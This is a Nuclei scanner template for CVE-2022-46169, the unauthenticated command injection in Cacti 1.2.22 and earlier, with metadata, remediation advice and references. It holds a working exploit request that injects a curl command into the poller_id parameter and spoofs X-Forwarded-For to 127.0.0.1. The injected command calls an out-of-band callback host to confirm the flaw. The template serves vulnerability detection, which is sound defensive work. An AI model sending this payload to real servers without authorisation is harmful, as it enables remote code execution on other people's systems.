id: CVE-2022-46169

info:
  name: Cacti <=1.2.22 - Remote Command Injection
  author: Hardik-Solanki,j4vaovo
  severity: critical
  description: |
    Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  remediation: |
    Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability.
  reference:
    - https://security-tracker.debian.org/tracker/CVE-2022-46169
    - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
    - https://www.cybersecurity-help.cz/vdb/SB2022121926
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46169
    - https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-46169
    cwe-id: CWE-78,CWE-74
    epss-score: 0.96741
    epss-percentile: 0.99541
    cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cacti
    product: cacti
    shodan-query: title:"Login to Cacti"
  tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth
variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1

    unsafe: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"value":'
          - '"local_data_id":'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100a88f1681161e4e55054e9ebf3e2b192b22a7e3fe74bb3f8411c92c01a2abe5280221009d43c5e0fdd3913d6b5a12ce4e7db072a5bebcc94e1d2e846d7896ee48b1baa7:922c64590222798bb761d5b6d8e72950